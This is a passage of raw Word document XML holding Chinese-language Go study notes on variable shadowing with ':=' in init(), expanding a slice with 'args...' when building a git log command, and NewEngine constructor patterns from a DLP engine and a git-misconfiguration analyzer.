          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成的，所以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是局部变量，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数中覆盖了全局变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。全局变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并没有被赋值，它还是原来的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D494AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B58794E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我本想在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中给全局变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>赋值的，却不小心用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建了一个局部变量导致全局变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有赋值成功，犯了一个低级错误。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C32719D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="263D6A6E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>var t int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D28C200" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func init() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA72AC7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    var err error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B20F7A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    t, err = strconv.Atoi("2")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC96F9A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCB27AE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        log.Fatalln(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BE3C04" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45113E65" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Println("init:", t)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41937378" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C1A712" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30334DA2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Println("main:", t)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B360F80" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FD7E90" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EED24B7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AA6687A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D031504" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A4A2EAA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AED2565" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26C07447" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是全局变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，给全局变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>赋值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中自然输出的就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，实现了我最初的目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40398084" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="293" w:name="_Toc159779753"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>切片变量名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拆分成各个元素</w:t>
      </w:r>
      <w:bookmarkEnd w:id="293"/>
    </w:p>
    <w:p w14:paraId="79040EAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如这里标黄处，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个列表，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>args...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种写法，表示把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个一个元素都列在这里</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB43B66" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C577A38" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func GitLog(source string, logOpts string) (&lt;-chan *gitdiff.File, error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F878BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>sourceClean := filepath.Clean(source)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113C753A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>var cmd *exec.Cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5769FD00" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if logOpts != "" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181BCC0F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>args := []string{"-C", sourceClean, "log", "-p", "-U0"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7013DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>args = append(args, strings.Split(logOpts, " ")...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB7233C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cmd = exec.Command("git", args...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCF8ABD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180A5B9D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>cmd = exec.Command("git", "-C", sourceClean, "log", "-p", "-U0",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60695F8A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"--full-history", "--all")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4583123D" w14:textId="7966A32C" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718EC6F2" w14:textId="780E2D89" w:rsidR="00EC0228" w:rsidRDefault="00EC0228" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F5D26F" w14:textId="79C33B3F" w:rsidR="00EC0228" w:rsidRDefault="00350078" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="294" w:name="_Toc159779754"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引擎的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:bookmarkEnd w:id="294"/>
    </w:p>
    <w:p w14:paraId="461D15C4" w14:textId="6A099407" w:rsidR="00350078" w:rsidRDefault="009C7C0C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>godlp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F49FBD" w14:textId="5EBBC182" w:rsidR="00A16F54" w:rsidRDefault="00A16F54" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>好处是可以定义引擎的一部分成员变量</w:t>
      </w:r>
      <w:r w:rsidR="00671D6F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，比如版本啥的。不能纯</w:t>
      </w:r>
      <w:r w:rsidR="00671D6F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidR="00671D6F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，否则纯</w:t>
      </w:r>
      <w:r w:rsidR="00671D6F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidR="00671D6F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不会</w:t>
      </w:r>
      <w:r w:rsidR="0091534A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接收个容易改变引擎下多个子功能的数值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6480DF2D" w14:textId="77777777" w:rsidR="00A16F54" w:rsidRDefault="00A16F54" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F51E803" w14:textId="2C457DB7" w:rsidR="009C7C0C" w:rsidRDefault="009C7C0C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func NewEngine(callerID string) (dlpheader.EngineAPI, error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243E7C94" w14:textId="77777777" w:rsidR="009C7C0C" w:rsidRDefault="009C7C0C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>defer recoveryImplStatic()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3E0A2B" w14:textId="77777777" w:rsidR="009C7C0C" w:rsidRDefault="009C7C0C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>eng := new(Engine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4318C347" w14:textId="77777777" w:rsidR="009C7C0C" w:rsidRDefault="009C7C0C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>eng.Version = Version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2808425A" w14:textId="77777777" w:rsidR="009C7C0C" w:rsidRDefault="009C7C0C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>eng.callerID = callerID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE63C14" w14:textId="77777777" w:rsidR="009C7C0C" w:rsidRDefault="009C7C0C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>eng.detectorMap = make(map[int32]detector.DetectorAPI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9BACC0" w14:textId="77777777" w:rsidR="009C7C0C" w:rsidRDefault="009C7C0C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>eng.maskerMap = make(map[string]mask.MaskAPI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553F014A" w14:textId="77777777" w:rsidR="009C7C0C" w:rsidRDefault="009C7C0C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D214EEB" w14:textId="77777777" w:rsidR="009C7C0C" w:rsidRDefault="009C7C0C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>return eng, nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AED96AF" w14:textId="31DD81D0" w:rsidR="00350078" w:rsidRDefault="009C7C0C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E3F690" w14:textId="4D066E8A" w:rsidR="00350078" w:rsidRDefault="00350078" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ACB762F" w14:textId="62C9F3E9" w:rsidR="009C7C0C" w:rsidRDefault="005626A2" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鹏哥的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gi</w:t>
      </w:r>
      <w:r>
        <w:t>t-misconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6971EDED" w14:textId="77777777" w:rsidR="005626A2" w:rsidRDefault="005626A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func NewEngine() *Engine {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C1967B" w14:textId="77777777" w:rsidR="005626A2" w:rsidRDefault="005626A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>return &amp;Engine{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B6D069" w14:textId="77777777" w:rsidR="005626A2" w:rsidRDefault="005626A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Analyzers: []analyzer.Analyzer{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B664347" w14:textId="77777777" w:rsidR="005626A2" w:rsidRDefault="005626A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//user.New(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2FF3A7" w14:textId="77777777" w:rsidR="005626A2" w:rsidRDefault="005626A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//project.New(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A3270F" w14:textId="77777777" w:rsidR="005626A2" w:rsidRDefault="005626A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>new(project.Analyzer),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651E38AC" w14:textId="77777777" w:rsidR="005626A2" w:rsidRDefault="005626A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//audit_event.New(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53711099" w14:textId="77777777" w:rsidR="005626A2" w:rsidRDefault="005626A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//settings.New(),</w:t>
      </w:r>
    </w:p>
